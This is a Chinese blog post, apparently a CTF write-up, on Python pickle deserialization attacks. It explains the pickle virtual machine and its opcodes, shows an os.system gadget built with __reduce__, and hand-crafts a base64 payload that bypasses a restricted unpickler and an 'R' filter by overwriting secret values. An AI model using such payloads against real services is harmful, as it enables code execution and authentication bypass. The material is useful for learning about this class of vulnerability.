pickle反序列化--高校抗“疫”网络安全分享赛

What is Pickle?

简介

前几天看到了p牛讲的pickle反序列化的文章,比赛正好出了,给了一个实战加深理解的机会。那么首先,我得知道pickle反序列化是什么东西。

pickle是一门栈语言,基于一个轻量的 PVM(Pickle Virtual Machine)。而PVM则主要包含指令处理器、stack和memo。

  • 指令处理器:处理OPcode和参数,对其进行解析。最后留在栈顶的值将作为反序列化对象返回。
  • stack:用来临时存储数据,参数和对象,由python的list实现,可理解为计算机的内存
  • memo:为PVM整个生命周期提供存储,由python的dict实现,可理解为计算机的硬盘存储

指令集

当前用于 pickle 的协议共有 5 种。使用的协议版本越高,读取生成的 pickle 所需的 Python 版本就要越新。

  • v0 版协议是原始的 “人类可读” 协议,并且向后兼容早期版本的 Python。
  • v1 版协议是较早的二进制格式,它也与早期版本的 Python 兼容。
  • v2 版协议是在 Python 2.3 中引入的。它为存储 new-style class 提供了更高效的机制。欲了解有关第 2 版协议带来的改进,请参阅 PEP 307
  • v3 版协议添加于 Python 3.0。它具有对 bytes 对象的显式支持,且无法被 Python 2.x 打开。这是目前默认使用的协议,也是在要求与其他 Python 3 版本兼容时的推荐协议。
  • v4 版协议添加于 Python 3.4。它支持存储非常大的对象,能存储更多种类的对象,还包括一些针对数据格式的优化。有关第 4 版协议带来改进的信息,请参阅 PEP 3154

指令集皆可在pickle源码中查询,下面给大家贴出来(比较长,可跳过

# Pickle opcodes.  See pickletools.py for extensive docs.  The listing
# here is in kind-of alphabetical order of 1-character pickle code.
# pickletools groups them by purpose.

MARK           = b'('   # push special markobject on stack
STOP           = b'.'   # every pickle ends with STOP
POP            = b'0'   # discard topmost stack item
POP_MARK       = b'1'   # discard stack top through topmost markobject
DUP            = b'2'   # duplicate top stack item
FLOAT          = b'F'   # push float object; decimal string argument
INT            = b'I'   # push integer or bool; decimal string argument
BININT         = b'J'   # push four-byte signed int
BININT1        = b'K'   # push 1-byte unsigned int
LONG           = b'L'   # push long; decimal string argument
BININT2        = b'M'   # push 2-byte unsigned int
NONE           = b'N'   # push None
PERSID         = b'P'   # push persistent object; id is taken from string arg
BINPERSID      = b'Q'   #  "       "         "  ;  "  "   "     "  stack
REDUCE         = b'R'   # apply callable to argtuple, both on stack
STRING         = b'S'   # push string; NL-terminated string argument
BINSTRING      = b'T'   # push string; counted binary string argument
SHORT_BINSTRING= b'U'   #  "     "   ;    "      "       "      " < 256 bytes
UNICODE        = b'V'   # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE     = b'X'   #   "     "       "  ; counted UTF-8 string argument
APPEND         = b'a'   # append stack top to list below it
BUILD          = b'b'   # call __setstate__ or __dict__.update()
GLOBAL         = b'c'   # push self.find_class(modname, name); 2 string args
DICT           = b'd'   # build a dict from stack items
EMPTY_DICT     = b'}'   # push empty dict
APPENDS        = b'e'   # extend list on stack by topmost stack slice
GET            = b'g'   # push item from memo on stack; index is string arg
BINGET         = b'h'   #   "    "    "    "   "   "  ;   "    " 1-byte arg
INST           = b'i'   # build & push class instance
LONG_BINGET    = b'j'   # push item from memo on stack; index is 4-byte arg
LIST           = b'l'   # build list from topmost stack items
EMPTY_LIST     = b']'   # push empty list
OBJ            = b'o'   # build & push class instance
PUT            = b'p'   # store stack top in memo; index is string arg
BINPUT         = b'q'   #   "     "    "   "   " ;   "    " 1-byte arg
LONG_BINPUT    = b'r'   #   "     "    "   "   " ;   "    " 4-byte arg
SETITEM        = b's'   # add key+value pair to dict
TUPLE          = b't'   # build tuple from topmost stack items
EMPTY_TUPLE    = b')'   # push empty tuple
SETITEMS       = b'u'   # modify dict by adding topmost key+value pairs
BINFLOAT       = b'G'   # push float; arg is 8-byte float encoding

TRUE           = b'I01\n'  # not an opcode; see INT docs in pickletools.py
FALSE          = b'I00\n'  # not an opcode; see INT docs in pickletools.py

# Protocol 2

PROTO          = b'\x80'  # identify pickle protocol
NEWOBJ         = b'\x81'  # build object by applying cls.__new__ to argtuple
EXT1           = b'\x82'  # push object from extension registry; 1-byte index
EXT2           = b'\x83'  # ditto, but 2-byte index
EXT4           = b'\x84'  # ditto, but 4-byte index
TUPLE1         = b'\x85'  # build 1-tuple from stack top
TUPLE2         = b'\x86'  # build 2-tuple from two topmost stack items
TUPLE3         = b'\x87'  # build 3-tuple from three topmost stack items
NEWTRUE        = b'\x88'  # push True
NEWFALSE       = b'\x89'  # push False
LONG1          = b'\x8a'  # push long from < 256 bytes
LONG4          = b'\x8b'  # push really big long

# Protocol 3 (Python 3.x)

BINBYTES       = b'B'   # push bytes; counted binary string argument
SHORT_BINBYTES = b'C'   #  "     "   ;    "      "       "      " < 256 bytes

# Protocol 4
SHORT_BINUNICODE = b'\x8c'  # push short string; UTF-8 length < 256 bytes
BINUNICODE8      = b'\x8d'  # push very long string
BINBYTES8        = b'\x8e'  # push very long bytes string
EMPTY_SET        = b'\x8f'  # push empty set on the stack
ADDITEMS         = b'\x90'  # modify set by adding topmost stack items
FROZENSET        = b'\x91'  # build frozenset from topmost stack items
NEWOBJ_EX        = b'\x92'  # like NEWOBJ but work with keyword only arguments
STACK_GLOBAL     = b'\x93'  # same as GLOBAL but using names on the stacks
MEMOIZE          = b'\x94'  # store top of the stack in memo
FRAME            = b'\x95'  # indicate the beginning of a new frame

pickle序列化

pickle代码主要依靠__reduce__魔术方法和手撸

  • __reduce__方法

    class exp(object):
        def __reduce__(self):
            s = r"""touch /tmp/success"""
            return (os.system, (s,))
        
    print(pickle.dumps(exp(), protocol=0))
    >>>b'cnt\nsystem\np0\n(Vtouch /tmp/success\np1\ntp2\nRp3\n.'
    
  • 手撸代码,可以依据pickletools进行调试分析

    $python -m pickletools pickle.txt
        0: c    GLOBAL     'nt system' # 向栈顶压入`posix.system`这个可执行对象
       11: p    PUT        0  # 将这个对象存储到memo的第0个位置
       14: (    MARK   # 压入一个元组的开始标志
       15: V        UNICODE    'touch /tmp/success'  # 压入一个字符串
       35: p        PUT        1   # 将这个字符串存储到memo的第1个位置
       38: t        TUPLE      (MARK at 14) # 将由刚压入栈中的元素弹出,再将由这个元素组成的元组压入栈中
       39: p    PUT        2  # 将这个元组存储到memo的第2个位置
       42: R    REDUCE  # 从栈上弹出两个元素,分别是可执行对象和元组,并执行,结果压入栈中
       43: p    PUT        3 # 将栈顶的元素(也就是刚才执行的结果)存储到memo的第3个位置
       46: .    STOP # 结束
    highest protocol among opcodes = 0 # v0协议
    
    >>>b'''cnt
    system
    p0
    (Vtouch /tmp/success
    p1
    tp2
    Rp3
    .'''
    

    注意:PVM 指令的书写规范
    (1)操作码是单字节的
    (2)带参数的指令用换行符定界

题目分析

题目名字为webtmp,以下是题目源码

import base64
import io
import sys
import pickle

from flask import Flask, Response, render_template, request
import secret

app = Flask(__name__)

class Animal:
    def __init__(self, name, category):
        self.name = name
        self.category = category

    def __repr__(self):
        return f'Animal(name={self.name!r}, category={self.category!r})'

    def __eq__(self, other):
        return type(other) is Animal and self.name == other.name and self.category == other.category

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == '__main__':
            return getattr(sys.modules['__main__'], name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

def restricted_loads(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()

def read(filename, encoding='utf-8'):
    with open(filename, 'r', encoding=encoding) as fin:
        return fin.read()

@app.route('/', methods=['GET''POST'])
def index():
    if request.args.get('source'):
        return Response(read(__file__), mimetype='text/plain')

    if request.method == 'POST':
        try:
            pickle_data = request.form.get('data')
            if b'R' in base64.b64decode(pickle_data):
                return 'No... I don\'t like R-things. No Rabits, Rats, Roosters or RCEs.'
            else:
                result = restricted_loads(base64.b64decode(pickle_data))
                if type(result) is not Animal:
                    return 'Are you sure that is an animal???'
            correct = (result == Animal(secret.name, secret.category))
            return render_template('unpickle_result.html', result=result, pickle_data=pickle_data, giveflag=correct)
        except Exception as e:
            print(repr(e))
            return "Something wrong"

    sample_obj = Animal('giaogiao''Giao')
    pickle_data = base64.b64encode(pickle.dumps(sample_obj)).decode()
    return render_template('unpickle_page.html', sample_obj=sample_obj, pickle_data=pickle_data)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)

很容易发现两个关键点

  • pickle反序列化,但是find_class里面module限制了只能sys.module['__main__']
  • 当correct为true时,可以获得flag

那么从判断条件来说,我们需要反序列化出一个animal对象,其属性分别等于secret中的name和category,然后便可以通过验证,拿到flag

题目中secret.py没有给出,不过可以不难猜出其大概长什么样

# secret.py
name="xxx"
category="?????"
#test
a = sys.modules['__main__'].secret.name
print(a) # xxx

接下来就有几种思路了

  • 获取secret中的name和category值,然后用其创建animal对象
  • 覆盖name和category的值,然后用自己覆盖的值去创建animal对象

第一种方法,经过各种尝试,无法实现__main__.secret.name的方式

那么考虑第二种思路,在翻阅pickle的各种协议文档时,在协议2文档中发现

可以通过反序列化更改其属性值 对应操作码为

BUILD          = b'b'   # call __setstate__ or __dict__.update()

这下思路就比较清晰了,先覆盖属性值,再生成animal对象,那么接下来就开始手撸pickle码

开始构造

# 第一部分payload,传入字典覆盖属性值
payload_1 = b'''c__main__
secret
}S'name'
S'xxxxx'
sS'category'
S'yyyyy'
sb.'''
# 第二部分payload,构造对象
exp = Animal("xxxxx","yyyyy")
payload_2 = pickle.dumps(exp)
#b'''\x80\x03c__main__\nAnimal\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00xxxxxq\x04X\x08\x00\x00\x00categoryq\x05X\x05\x00\x00\x00yyyyyq\x06ub.'''
# 合并payload
payload = b'''c__main__
secret
}S'name'
S'xxxxx'
sS'category'
S'yyyyy'
sbc__main__\nAnimal\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00xxxxxq\x04X\x08\x00\x00\x00categoryq\x05X\x05\x00\x00\x00yyyyyq\x06ub.'''

print(base64.b64encode(payload))
#Y19fbWFpbl9fCnNlY3JldAp9UyduYW1lJwpTJ3h4eHh4JwpzUydjYXRlZ29yeScKUyd5eXl5eScKc2JjX19tYWluX18KQW5pbWFsCnEAKYFxAX1xAihYBAAAAG5hbWVxA1gFAAAAeHh4eHhxBFgIAAAAY2F0ZWdvcnlxBVgFAAAAeXl5eXlxBnViLg==

Getflag

相关链接:

posted @   DEADF1SH_CAT  阅读(1130)  评论(0编辑  收藏  举报
编辑推荐:
· 聊一聊 操作系统蓝屏 c0000102 的故障分析
· SQL Server 内存占用高分析
· .NET Core GC计划阶段(plan_phase)底层原理浅谈
· .NET开发智能桌面机器人:用.NET IoT库编写驱动控制两个屏幕
· 用纯.NET开发并制作一个智能桌面机器人:从.NET IoT入门开始
阅读排行:
· 我干了两个月的大项目,开源了!
· 推荐一款非常好用的在线 SSH 管理工具
· 聊一聊 操作系统蓝屏 c0000102 的故障分析
· 千万级的大表,如何做性能调优?
· .NET周刊【1月第1期 2025-01-05】
点击右上角即可分享
微信分享提示